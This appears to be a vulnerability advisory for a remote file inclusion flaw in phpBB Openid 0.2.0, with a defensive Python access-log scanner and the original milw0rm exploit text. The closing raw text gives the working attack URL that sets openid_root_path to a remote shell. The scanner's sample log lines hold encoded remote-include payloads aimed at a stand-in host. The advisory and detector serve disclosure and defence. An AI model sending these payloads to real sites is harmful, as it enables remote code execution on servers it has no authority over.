Vendor: phpBB Openid
By: milw0rm.com
CVSS: 7.5 (HIGH)
Type: Remote File Inclusion
CWE: 98
Product Name: phpBB Openid
Affected Version From: 0.2.0
Affected Version To: 0.2.0
Patch Exists: NO
2007

phpBB Openid 0.2.0 Remote File Include

The vulnerability allows remote attackers to include arbitrary files by supplying a specially crafted URL in the openid_root_path parameter of BBStore.php (/includes/openid/Auth/OpenID/BBStore.php).

Mitigation:

Update to a patched version of phpBB Openid or implement proper input validation to prevent remote file inclusion.
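
Because no patch is listed, web access logs are a practical place to check whether the parameter has been set from outside. The following is an added example, not code from phpBB Openid or from the original advisory: it scans access-log lines for requests to BBStore.php that set openid_root_path and separates values that look like a URL or stream wrapper from other values. The log lines are constructed, and the verdict names "param-set" and "remote-include" are hypothetical labels.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

SCRIPT = "/bbstore.php"        # file named in the advisory (compared lowercase)
PARAM = "openid_root_path"     # parameter named in the advisory
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
# URL scheme or PHP stream wrapper (http://, ftp://, php://, data:), or //host, \\host
REMOTE = re.compile(r'^\s*(?:[a-z][a-z0-9+.-]*:|//|\\\\)', re.I)

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding so %253A still ends up as ':'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return None, 'param-set' or 'remote-include' for one access-log line."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not unquote(url.path).lower().endswith(SCRIPT):
        return None
    for key, value in parse_qsl(url.query, keep_blank_values=True):
        # PHP turns '.' and ' ' in incoming parameter names into '_'
        if key.replace(".", "_").replace(" ", "_") == PARAM:
            return "remote-include" if REMOTE.match(fully_decode(value)) else "param-set"
    return None

PREFIX = '192.0.2.7 - - [30/Sep/2007:10:00:00 +0000] "GET '
TARGET = "/includes/openid/Auth/OpenID/BBStore.php"
SAMPLE_LOG = [  # constructed lines, not real traffic
    PREFIX + '/index.php HTTP/1.1" 200 5120',
    PREFIX + TARGET + ' HTTP/1.1" 200 0',
    PREFIX + TARGET + '?openid_root_path=../../ HTTP/1.1" 200 0',
    PREFIX + TARGET + '?openid_root_path=http%3A%2F%2Fhost.invalid%2Fx%3F HTTP/1.1" 200 312',
    PREFIX + TARGET + '?openid.root.path=http%253A%252F%252Fhost.invalid%252Fx HTTP/1.1" 200 312',
]

def scan(lines):
    """Return (line_number, verdict) for every line that sets the parameter."""
    return [(n, v) for n, line in enumerate(lines, 1) if (v := classify(line))]

if __name__ == "__main__":
    for n, verdict in scan(SAMPLE_LOG):
        print(n, verdict)
```

Only the query string is inspected, so a value sent in a POST body will not appear in a standard access log and needs request-body logging to be seen.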

Exploit-DB raw data:

============================================
=                                          =
=             XORON  (c) 2007              =
=                                          =
============================================
=                                          =
=  phpBB Openid 0.2.0 Remote File Include  =
=                                          =
============================================
=
= Download:
= http://sourceforge.net/project/showfiles.php?group_id=178846
=
============================================
=
= Exploit:
= /includes/openid/Auth/OpenID/BBStore.php?openid_root_path=shell?
=
============================================
=                                          =
=      Special thanks "k1tkat"  :)         =
=                                          =
============================================ 

# milw0rm.com [2007-09-30]